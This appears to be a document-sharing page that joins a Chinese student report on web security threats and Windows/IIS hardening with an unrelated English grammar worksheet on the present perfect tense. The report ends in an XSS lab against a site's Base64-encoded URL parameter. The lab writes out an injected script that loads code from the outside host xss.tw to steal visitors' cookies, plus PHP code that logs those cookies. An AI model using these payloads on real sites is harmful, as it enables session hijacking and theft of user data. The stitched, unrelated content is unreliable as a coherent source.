nèi)容進行傳播。八、Web面臨的安全威脅來自網(wǎng)絡上的安全威脅與攻擊多種多樣,依照Web訪問的結(jié)構,可將其分類為對Web服務器的安全威脅、對Web客戶機的安全威脅和對通信信道的安全威脅三類。(一)對Web服務器的安全威脅對于Web服務器、服務器的操作系統(tǒng)、數(shù)據(jù)庫服務器都有可能存在漏洞,惡意用戶都有可能利用這些漏洞去獲得重要信息。Web服務器上的漏洞可以從以下幾方面考慮:1、在Web服務器上的機密文件或重要數(shù)據(jù),如存放用戶名、口令的文件放置在不安全區(qū)域,被入侵后很容易得到。2、在Web數(shù)據(jù)庫中,保存的有價值信息,如商業(yè)機密數(shù)據(jù)、用戶信息等,如果數(shù)據(jù)庫安全配置不當,很容易泄密。3、Web服務器本身存在一些漏洞,能被黑客利用侵入到系統(tǒng),破壞一些重要的數(shù)據(jù),甚至造成系統(tǒng)癱瘓。4、程序員的有意或無意在系統(tǒng)中遺漏Bugs給非法黑客創(chuàng)造條件。用CGI腳本編寫的程序中的自身漏洞。(二)對Web客戶機的安全威脅現(xiàn)在網(wǎng)頁中的活動內(nèi)容已被廣泛應用,活動內(nèi)容的不安全性是造成客戶端的主要威脅。網(wǎng)頁的活動內(nèi)容是指在靜態(tài)網(wǎng)頁中嵌入的對用戶透明的程序,它可以完成一些動作,顯示動態(tài)圖像、下載和播放音樂、視頻等。當用戶使用瀏覽器查看帶有活動內(nèi)容的網(wǎng)頁時,這些應用程序會自動下載并在客戶機上運行,如果這些程序被惡意使用,可以竊取、改變或刪除客戶機上的信息。主要用到JavaApplet和ActiveX技術。JavaApplet使用Java語言開發(fā),隨頁面下載,Java使用沙盒根據(jù)安全模式所定義的規(guī)則來限制JavaApplet的活動,它不會訪問系統(tǒng)中規(guī)定安全范圍之外的程序代碼。但事實上JavaApplet存在安全漏洞,可能被利用進行破壞。ActiveX是微軟的一個控件技術,它封裝由網(wǎng)頁設計者放在網(wǎng)頁中來執(zhí)行特定的任務的程序,可以由微軟支持的多種語言開發(fā)但只能運行在Windows平臺。ActiveX在安全性上不如JavaApplet,一旦下載,能像其他程序一樣執(zhí)行,訪問包括操作系統(tǒng)代碼在內(nèi)的所有系統(tǒng)資源,這是非常危險的。Cookie是Netscape公司開發(fā)的,用來改善HTTP的無狀態(tài)性。無狀態(tài)的表現(xiàn)使得制造像購物車這樣要在一定時間內(nèi)記住用戶動作的東西很難。Cookie實際上是一段小消息,在瀏覽器第一次連接時由HTTP服務器送到瀏覽器端,以后瀏覽器每次連接都把這個Cookie的一個拷貝返回給Web服務器,服務器用這個Cookie來記憶用戶和維護一個跨多個頁面的過程影像。Cookie不能用來竊取關于用戶或用戶計算機系統(tǒng)的信息,它們只能在某種程度上存儲用戶的信息,如計算機名字、IP地址、瀏覽器名稱和訪問的網(wǎng)頁的URL等。所以,Cookie是相對安全的。(三)對通信信道的安全威脅Internet是連接Web客戶機和服務器通信的信道,是不安全的。像Sniffer這樣的嗅探程序,可對信道進行偵聽,竊取機密信息,存在著對保密性的安全威脅。未經(jīng)授權的用戶可以改變信道中的信息流傳輸內(nèi)容,造成對信息完整性的安全威脅。此外,還有像利用拒絕服務攻擊,向網(wǎng)站服務器發(fā)送大量請求造成主機無法及時響應而癱瘓,或者發(fā)送大量的IP數(shù)據(jù)包來阻塞通信信道,使網(wǎng)絡的速度便緩慢。九、Web的安全防護技術(一)Web客戶端的安全防護Web客戶端的防護措施,重點對Web程序組件的安全進行防護,嚴格限制從網(wǎng)絡上任意下載程序并在本地執(zhí)行。可以在瀏覽器進行設置,如MicrosoftInternetExplorer的Internet選項的高級窗口中將Java相關選項關閉。在安全窗口中選擇自定義級別,將ActiveX組件的相關選項選為禁用。在隱私窗口中根據(jù)需要選擇Cookie的級別,也可以根據(jù)需要將c:\windows\cookie下的所有Cookie相關文件刪除。(二)通信信道的安全防護通信信道的防護措施,可在安全性要求較高的環(huán)境中,利用HTTPS協(xié)議替代HTTP協(xié)議。利用安全套接層協(xié)議SSL保證安全傳輸文件,SSL通過在客戶端瀏覽器軟件和Web服務器之間建立一條安全通信信道,實現(xiàn)信息在Internet中傳送的保密性和完整性。但SSL會造成Web服務器性能上的一些下降。(三)Web服務器端的安全防護限制在Web服務器中賬戶數(shù)量,對在Web服務器上建立的賬戶,在口令長度及定期更改方面作出要求,防止被盜用。Web服務器本身會存在一些安全上的漏洞,需要及時進行版本升級更新。盡量使EMAIL、數(shù)據(jù)庫等服務器與Web服務器分開,去掉無關的網(wǎng)絡服務。在Web服務器上去掉一些不用的如SHELL之類的解釋器。定期查看服務器中的日志文件,分析一切可疑事件。設置好Web服務器上系統(tǒng)文件的權限和屬性。通過限制許可訪問用戶IP或DNS。從CGI編程角度考慮安全。采用編譯語言比解釋語言會更安全些,并且CGI程序應放在獨立于HTML存放目錄之外的CGI-BIN下等措施。十、Web服務器安全防護策略的應用這里以目前應用較多的Windows2000平臺和IIS的Web服務器為例簡述Web服務器端安全防護的策略應用(一)系統(tǒng)安裝的安全策略安裝Windows2000系統(tǒng)時不要安裝多余的服務和多余的協(xié)議,因為有的服務存在有漏洞,多余的協(xié)議會占用資源。安裝Windows2000后一定要及時安裝補丁4程序(W2KSP4_CN.exe),立刻安裝防病毒軟件。(二)系統(tǒng)安全策略的配置通過“本地安全策略”限制匿名訪問本機用戶、限制遠程用戶對光驅(qū)或軟驅(qū)的訪問等。通過“組策略”限制遠程用戶對Netmeeting的桌面共享、限制用戶執(zhí)行Windows安裝任務等安全策略配置。(三)IIS安全策略的應用在配置Internet信息服務(IIS)時,不要使用默認的Web站點,刪除默認的虛擬目錄映射;建立新站點,并對主目錄權限進行設置。一般情況下設置成站點管理員和Administrator兩個用戶可完全控制,其他用戶可以讀取文件。(四)審核日志策略的配置當Windows2000出現(xiàn)問題的時候,通過對系統(tǒng)日志的分析,可以了解故障發(fā)生前系統(tǒng)的運行情況,作為判斷故障原因的根據(jù)。一般情況下需要對常用的用戶登錄日志,HTTP和FTP日志進行配置。1、設置登錄審核日志審核事件分為成功事件和失敗事件。成功事件表示一個用戶成功地獲得了訪問某種資源的權限,而失敗事件則表明用戶的嘗試失敗。2、設置HTTP審核日志通過“Internet服務管理器”選擇Web站點的屬性,進行設置日志的屬性,可根據(jù)需要修改日志的存放位置。3、設置FTP審核日志設置方法同HTTP的設置基本一樣。選擇FTP站點,對其日志屬性進行設置,然后修改日志的存放位置。(五)網(wǎng)頁發(fā)布和下載的安全策略因為Web服務器上的網(wǎng)頁,需要頻繁進行修改。因此,要制定完善的維護策略,才能保證Web服務器的安全。有些管理員為方便起見,采用共享目錄的方法進行網(wǎng)頁的下載和發(fā)布,但共享目錄方法很不安全。因此,在Web服務器上要取消所有的共享目錄。網(wǎng)頁的更新采用FTP方法進行,選擇對該FTP站點的訪問權限有“讀取、寫入”權限。對FTP站點屬性的“目錄安全性”在“拒絕訪問”對話框中輸入管理維護工作站的IP地址,限定只有指定的計算機可以訪問該FTP站點,并只能對站點目錄進行讀寫操作。實驗:網(wǎng)頁首頁,正常顯示發(fā)現(xiàn)可疑漏洞,地址欄出現(xiàn)編碼后的信息。這是一段明顯的Base64加密,對其進行解碼

解密為:

title=%B5%C7%C2%BD%CA%A7%B0%DC%A3%AC%C3%DC%C2%EB%B2%BB%D5%FD%C8%B7%A1%A3&link=&url=

采用了雙重解碼機制,這是一段URL編碼,我們再次解碼得到:title=登陸失敗,密碼不正確。&link=&url=

這是一個可跨站點,我們構造代碼進行測試。代碼構造如下:title=%B5%C7%C2%BD%CA%A7%B0%DC%A3%AC%C3%DC%C2%EB%B2%BB%D5%FD%C8%B7%A1%A3</html><script>alert(“xss測試學號2011211975”)</script>&link=&url=進行反向編碼dGl0bGU9JUI1JUM3JUMyJUJEJUNBJUE3JUIwJURDJUEzJUFDJUMzJURDJUMyJUVCJUIyJUJCJUQ1JUZEJUM4JUI3JUExJUEzPC9odG1sPjxzY3JpcHQ+YWxlcnQoHHhzc0vVIGb3MjAxMTIxMTk3NR0pPC9zY3JpcHQ+JiBsaW5rPSZ1cmw9帶入地址欄運行,得到測試成功,構造代碼竊取cookie.title=%B5%C7%C2%BD%CA%A7%B0%DC%A3%AC%C3%DC%C2%EB%B2%BB%D5%FD%C8%B7%A1%A3</html><scriptsrc=http://xss.tw/3841></script>&link=&url=編碼后得到:dGl0bGU9JUI1JUM3JUMyJUJEJUNBJUE3JUIwJURDJUEzJUFDJUMzJURDJUMyJUVCJUIyJUJCJUQ1JUZEJUM4JUI3JUExJUEzPC9odG1sPjxzY3JpcHQgc3JjPWh0dHA6Ly94c3MudHcvMzg0MT48L3NjcmlwdD4mbGluaz0mdXJsPQ==其中xss.tw是網(wǎng)絡上所架構的一個xss測試平臺,可以作為一個中轉(zhuǎn)站記錄點擊者cookie.這類滲透的平臺的原理都是基于PHP等語言的cookie調(diào)用獲取,核心功能代碼如下:<?php$cookie=$_GET['cookie'];//以GET方式獲取cookie變量值$ip=$_SERVER['REMOTE_ADDR'];//遠程主機IP地址$time=date('Y-m-dg:i:s');//以“年-月-日時:分:秒”的格式顯示時間$referer=$_SERVER['HTTP_REFERER'];//鏈接來源$agent=$_SERVER['HTTP_USER_AGENT'];//用戶瀏覽器類型?>可見前端的漏洞是無處不在的,我們還應該更多地了解好這些安全的機理才能在以后無論是編寫網(wǎng)站、軟件或者從事相關工作時有更好的安全意識和防范措施。

初中英語語法現(xiàn)在完成時練習題及答案[1]初中英語語法現(xiàn)在完成時練習題及答案[1]

/初中英語語法現(xiàn)在完成時練習題及答案[1]一、時態(tài)講解:現(xiàn)在完成時(1)構成:現(xiàn)在完成時由助動詞have+過去分詞構成,助動詞have有人稱和數(shù)的變化。第三人稱單數(shù)用has,其余用have.現(xiàn)在完成時的否定式直接在助動詞后面加上not、疑問式是把助動詞提到主語之前。以study為例,其否定式、疑問式和簡單回答形式如下:否定式

疑問式

Ihavenot(haven’t)studied….

HaveIstudied…?

Youhavenot(haven’t)studied….

Haveyoustudied…?

Hehasnot(hasn’t)studied….

Hashestudied…?

否定疑問式

簡單回答(肯定/否定)

HaveInot(Haven’tI)studied…?

Yes,youhave.No,youhaven’t.

Haveyounot(Haven’tyou)studied…?

Yes,Ihave.No,Ihaven’t.

Hashenot(Hasn’the)studied…?

Yes,hehas.No,hehasn’t.

(2)用法:1)現(xiàn)在完成時通常表示在說話之前已經(jīng)完成的動作或存在的狀態(tài)。說話人強調(diào)的是該動作或狀態(tài)對現(xiàn)在的結(jié)果或影響。Mydaughterhasjustgoneout.我女兒剛出去。I’msurewe’vemetbefore.我肯定我們以前見過面。Shehasarrived.她到了。2)表示持續(xù)到現(xiàn)在的動作或狀態(tài),往往和包括現(xiàn)在在內(nèi)的表示一段時間的狀語連用,如recently,already,just,lately,for…,since…,yet等。如:Ihaven’theardfromherthesedays.這些日子我沒有收到她的信。Wehaven’tseenyourecently.最近我們沒有見到你。Theyhavebeenawayfortwoyears.他們離開已經(jīng)兩年了。ShehasbeenwithussinceMonday.★注意:since和for的區(qū)別since后接時間點,如1993,lastterm,yesterday,thetimeIgottherefor后接一段時間,表示“長達多久”,如tenyears,awhile,twodays等。Exercise:用since和for填空1.JimhasbeeninIreland______Monday.2.JillhasbeeninIreland______threedays.3.HisaunthaslivedinAustralia______15days.4.Maryisinheroffice.Shehasbeenthere______7o'clock.5.Indiahasbeenanindependentcountry______1974.6.Thebusislate.They'vebeenwaiting______20minutes.7.Nobodylivesinthosehouses.Theyhavebeenempty______manyyears.8.Mikehasbeenill______alongtime.Hehasbeeninhospital______October.2)表示短暫意義的動詞如arrive,leave,borrow,buy,begin,start,die等,在完成時當中不能和表示一段時間的狀語連用,因為它們表示的動作不可能持續(xù)。因此,不能說:Hehascomeherefor2weeks.×Theoldmanhasdiedfor4months.×Theyhaveleftonlyfor5minutes.×以上三句話可以改為:Hehasbeenherefor2weeks.Theoldmanhas_____________for4months.Theyhave__________onlyfor5minutes2)have(has)been和have(has)gone的區(qū)別:表示“曾到過某地”要用“have(has)been”;表示“已經(jīng)去某地”要用“have(has)gone”。試比較:Wherehashebeen?他剛才到哪里去了?(已經(jīng)回來了)Wherehashegone?他上哪兒去了?(人不在)TheyhavebeentoCanada.他們到過加拿大。(現(xiàn)在已經(jīng)不在加拿大)TheyhavegonetoCanada.他們到加拿大去了。(可能在路上和已經(jīng)到加拿大).3)現(xiàn)在完成時不能和表示過去的時間狀語連用,如yesterday,lastyear,in1976,twodaysago,justnow,whenIcamein,但可以和already,yet,sometimes,always,often,before,lately,recently,once,twice,ever,never等連用。例如:Shehasalreadycome.她已經(jīng)來了。Ihaven’treadityet.我還沒讀過這個。Ihavemethimbefore.我從前曾見過他。MaHonghasalwaysbeenagoodstudent.馬紅一直是個好學生。Ihaveoftenseenhiminthestreet.我經(jīng)常在街上看見他。TheyhaveneverbeentoYan’an.他們從未去過延安。Ihaven'tseenhimlately.我近來沒看到他。IrregularVerbs

BaseForm

PastForm

PastParticiple

bear

bore

born

beat

beat

beaten

become

became

become

blow

blew

blown

bring

brought

brought

build

built

built

buy

bought

bought

catch

caught

caught

choose

chose

chosen

come

came

come

do

did

done

drink

drank

drunk

drive

drove

driven

eat

ate

eaten

fall

fell

fallen

find

found

found

fly

flew

flown

get

got

got

give

gave

given

go

went

gone

grow

grew

grown

have

had

had

hear

heard

heard

keep

kept

kept

leave

left

left

lose

lost

lost

make

made

made

put

put

put

read

read

read

run

ran

run

say

said

said

see

saw

seen

sell

sold

sold

send

sent

sent

sing

sang

sung

sink

sank/sunk

sunk

take

took

taken

teach

taught

taught

write

wrote

wrote

am,is

was

been

are

were

been

Exercise:I.Fillintheblankswiththeproperform.1.I____already____(see)thefilm.I________(see)itlastweek.2._____he____(finish)hisworktoday?Notyet.3.Myfather____just____(come)backfromwork.Heistirednow.4.Where’sLiMing?He__________(go)totheteacher’soffice.5.I__________(work)heresinceI______(move)herein1999.6.SofarI_______________(make)quiteafewfriendshere.7.Howlong________theWangs______________(stay)here?Fortwoweeks.8.I________just___________(finish)myhomework.9.He________(go)toschoolonfooteveryday.10.____you______(find)yoursciencebookyet?11.Ifit____(be)finetomorrow,I'llgowithyou.12.Thestudents____________(read)Englishwhentheteachercamein.13.Look!Themonkey__________(climb)thetree.14.Mymother__________(come)toseemenextSunday.15.I'velostmypen._________you________(see)itanywhere?II.Choosethebestanswer.1.Howlonghaveyou_______here?A.come B.got C.arrived D.been2.Mygrandpadied_________.A.attheageofmy2 B.for2yearsC.whenIwas2. D.myagewas6.3.Janehas_____toBeiJing.Shewillcomebacktomorrow.A.been B.gone C.went D.neverbeen4.Itistenyears_____Ilastsawher.A.after B.sinceC.forD.that5.--WhowillgotothestationtomeetLorry?--Iwill.I_____herseveraltimes.A.met B.havemet C.hadmet D.willmeet6.--Whatanicedress!Howlong_____you_____it?--Just2weeks.A.will,buy B.did,buy C.are,having D.have,had7.--DoyouknowLydiaverywell?--Yes,SheandI_____friendssincewewereveryyoung.A.havemade B.havebecome C.havebeen D.haveturned8.TheSmiths_______inChinafor8years.A.haslived B.lived C.havebeen D.live9.--Hello,thisisMr.Greenspeaking.CanIspeaktoMr.Black?--Sorry.He______theBainiaoPark.A.hasbeento B.hasgoneto C.wentto D.willgoto10.--____youever____totheUS?--Yes,twice.A.Have,goneB.Have,been C,Do,go D.were,goingIII.Rewritethesentences.1.IhavebeentoMacaubefore.(改為否定句)?I__________________beentoMacaubefore.

2.Hehasn’tcometoschoolbecausehewasill.(就劃線部分提問)_____________hecometoschool?

3.Iboughanewbikejustnow.(用just改寫)??I____just____anewbike.

4.WebegantolearnEnglishthreeyearsago.(改為同義句)We________English____threeyears5.Hehasneversurfed,______________?(改成反意疑問句)6.Theyhavebeenheresince2000.(對劃線部分提問)______________havetheybeenhere?7.Theoldman_________lastyear.Hehas______________forayear.(die)(動詞填空)8.MissGaoleftanhourago.(同義句轉(zhuǎn)換)MissGaohas_______________________anhourago.Askthequestions1)Ihavebeentherefortwodays._____________________________you____________________?2)Myfatherhaslivedheresince2000.____________________________yourfather___________________?3)Helefthereyesterday.4)Theyboughtabooktwohoursago._____________________they__________abook?Use“never,ever,already,just,yet,for,since”tofillintheblanks.1.Ihave_______seenhimbefore,soIhavenoideaabouthim.2.Jackhas_________finishedhishomework.3.Mr.Wanghastaughtinthisschool________tenyears.4.“Haveyou________seenthefilm?”“No,Ihave________seenit.”5.“Hasthebusleft_______?”“Yes,ithas_________left.”現(xiàn)在完成時練習題一、翻譯下列句子:你曾經(jīng)吃過魚和薯條嗎?2.我剛剛丟了我的化學書。3.我以前從來沒去過那個農(nóng)場。4.他已經(jīng)吃過午飯5.你已經(jīng)看過這部電影了嗎?6.我哥哥還沒回來。7.這本字典我已買了三年了。8.他離開中國三年了。9.我認識他們五年了。10.他們已去了美國五年了。11.自從他搬到濟寧,他就住這兒了。12.我妹妹成為一個大學生已經(jīng)三年。13.自從1999年以來他們就認識。14.我來到這個學校已3年多了。二、用since和for填空1.______twoyears2.____twoyearsago3.___lastmonth4.______19995._______yesterday6._______4o’clock74hours8._____anhourago9.___wewerechildren10._____lunchtime11.____shelefthere12.HehaslivedinNanjing___theyearb

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經(jīng)權益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
  • 6. 下載文件中如有侵權或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論